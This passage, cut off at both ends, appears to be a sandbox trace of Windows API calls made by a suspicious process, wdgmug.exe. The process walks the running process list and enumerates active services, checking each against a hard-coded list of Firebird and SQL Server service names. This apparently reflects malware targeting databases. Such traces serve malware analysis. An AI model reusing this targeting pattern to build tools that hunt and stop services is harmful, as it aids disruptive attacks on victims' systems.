th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0303.833] lstrlenW (lpString="taskhostw.exe") returned 13 [0303.833] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0303.834] lstrlenW (lpString="explorer.exe") returned 12 [0303.834] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0303.835] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0303.835] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0303.836] lstrlenW (lpString="SearchUI.exe") returned 12 [0303.836] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0303.836] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0303.836] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.837] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0303.837] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0303.838] lstrlenW (lpString="wdgmug.exe") returned 10 [0303.838] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0303.839] lstrlenW (lpString="cmd.exe") returned 7 [0303.839] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0303.840] lstrlenW (lpString="conhost.exe") returned 11 [0303.840] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0303.841] lstrlenW (lpString="mode.com") returned 8 [0303.841] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0303.841] CloseHandle (hObject=0x4ec) returned 1 [0303.842] Sleep (dwMilliseconds=0x1f4) [0304.558] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a260 [0304.559] EnumServicesStatusExW (in: hSCManager=0x401a260, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0304.560] GetLastError () returned 0xea [0304.560] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4150720 [0304.560] EnumServicesStatusExW (in: hSCManager=0x401a260, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4150720, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4150720, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0304.561] CloseServiceHandle (hSCObject=0x401a260) returned 1 [0304.561] lstrlenW (lpString="AppXSvc") returned 7 [0304.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0304.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0304.562] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0304.562] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0304.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0304.562] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0304.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0304.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0304.562] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0304.562] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0304.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0304.562] lstrlenW (lpString="Audiosrv") returned 8 [0304.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0304.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0304.562] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0304.562] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0304.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0304.562] lstrlenW (lpString="BFE") returned 3 [0304.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0304.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0304.562] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0304.562] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0304.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0304.562] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0304.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0304.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0304.562] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0304.562] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0304.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0304.562] lstrlenW (lpString="CDPSvc") returned 6 [0304.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0304.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0304.563] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0304.563] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0304.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0304.563] lstrlenW (lpString="ClickToRunSvc") returned 13 [0304.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0304.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0304.563] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0304.563] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0304.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0304.563] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0304.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0304.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0304.563] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0304.563] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0304.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0304.563] lstrlenW (lpString="CryptSvc") returned 8 [0304.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0304.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0304.563] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0304.563] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0304.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0304.563] lstrlenW (lpString="DcomLaunch") returned 10 [0304.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0304.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0304.564] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0304.564] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0304.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0304.564] lstrlenW (lpString="DeviceAssociationService") returned 24 [0304.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0304.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0304.564] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0304.564] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0304.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0304.564] lstrlenW (lpString="Dhcp") returned 4 [0304.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0304.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0304.564] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0304.564] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0304.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0304.564] lstrlenW (lpString="Dnscache") returned 8 [0304.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0304.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0304.564] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0304.564] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0304.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0304.564] lstrlenW (lpString="DPS") returned 3 [0304.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0304.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0304.564] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0304.564] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0304.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0304.565] lstrlenW (lpString="DusmSvc") returned 7 [0304.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0304.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0304.565] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0304.565] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0304.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0304.565] lstrlenW (lpString="EventLog") returned 8 [0304.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0304.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0304.565] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0304.565] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0304.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0304.565] lstrlenW (lpString="EventSystem") returned 11 [0304.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0304.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0304.565] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0304.565] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0304.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0304.565] lstrlenW (lpString="FontCache") returned 9 [0304.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0304.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0304.565] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0304.565] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0304.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0304.565] lstrlenW (lpString="gpsvc") returned 5 [0304.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0304.566] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0304.566] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0304.566] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0304.566] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0304.566] lstrlenW (lpString="iphlpsvc") returned 8 [0304.566] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0304.566] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0304.566] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0304.566] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0304.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0304.568] lstrlenW (lpString="KeyIso") returned 6 [0304.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0304.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0304.568] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0304.568] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0304.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0304.568] lstrlenW (lpString="LanmanServer") returned 12 [0304.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0304.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0304.568] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0304.568] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0304.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0304.568] lstrlenW (lpString="LanmanWorkstation") returned 17 [0304.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0304.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0304.568] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0304.568] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0304.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0304.568] lstrlenW (lpString="lfsvc") returned 5 [0304.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0304.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0304.568] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0304.568] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0304.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0304.568] lstrlenW (lpString="lmhosts") returned 7 [0304.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0304.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0304.569] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0304.569] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0304.569] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0304.569] lstrlenW (lpString="LSM") returned 3 [0304.569] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0304.569] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0304.569] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0304.569] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0304.569] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0304.569] lstrlenW (lpString="MpsSvc") returned 6 [0304.569] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0304.569] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0304.569] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0304.569] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0304.569] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0304.569] lstrlenW (lpString="NcbService") returned 10 [0304.569] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0304.569] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0304.569] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0304.569] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0304.569] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0304.569] lstrlenW (lpString="netprofm") returned 8 [0304.569] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0304.569] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0304.569] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0304.569] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0304.569] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0304.570] lstrlenW (lpString="NgcSvc") returned 6 [0304.570] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0304.570] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0304.570] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0304.570] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0304.570] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0304.570] lstrlenW (lpString="NlaSvc") returned 6 [0304.570] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0304.570] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0304.570] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0304.570] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0304.570] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0304.570] lstrlenW (lpString="nsi") returned 3 [0304.570] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0304.570] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0304.570] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0304.570] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0304.570] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0304.570] lstrlenW (lpString="PcaSvc") returned 6 [0304.570] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0304.570] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0304.570] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0304.570] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0304.570] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0304.570] lstrlenW (lpString="PlugPlay") returned 8 [0304.570] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0304.570] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0304.570] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0304.570] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0304.571] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0304.571] lstrlenW (lpString="Power") returned 5 [0304.571] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0304.571] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0304.571] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0304.571] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0304.571] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0304.571] lstrlenW (lpString="ProfSvc") returned 7 [0304.571] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0304.571] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0304.571] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0304.571] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0304.571] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0304.571] lstrlenW (lpString="RpcEptMapper") returned 12 [0304.571] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0304.571] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0304.571] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0304.571] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0304.571] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0304.571] lstrlenW (lpString="RpcSs") returned 5 [0304.571] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0304.571] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0304.571] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0304.571] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0304.571] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0304.571] lstrlenW (lpString="SamSs") returned 5 [0304.571] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0304.571] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0304.572] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0304.572] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0304.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0304.572] lstrlenW (lpString="Schedule") returned 8 [0304.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0304.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0304.572] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0304.572] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0304.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0304.572] lstrlenW (lpString="SecurityHealthService") returned 21 [0304.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0304.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0304.572] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0304.572] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0304.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0304.572] lstrlenW (lpString="SENS") returned 4 [0304.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0304.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0304.572] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0304.572] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0304.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0304.572] lstrlenW (lpString="ShellHWDetection") returned 16 [0304.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0304.572] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0304.572] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0304.572] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0304.572] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0304.572] lstrlenW (lpString="Spooler") returned 7 [0304.572] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0304.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0304.573] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0304.573] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0304.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0304.573] lstrlenW (lpString="StateRepository") returned 15 [0304.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0304.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0304.573] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0304.573] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0304.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0304.573] lstrlenW 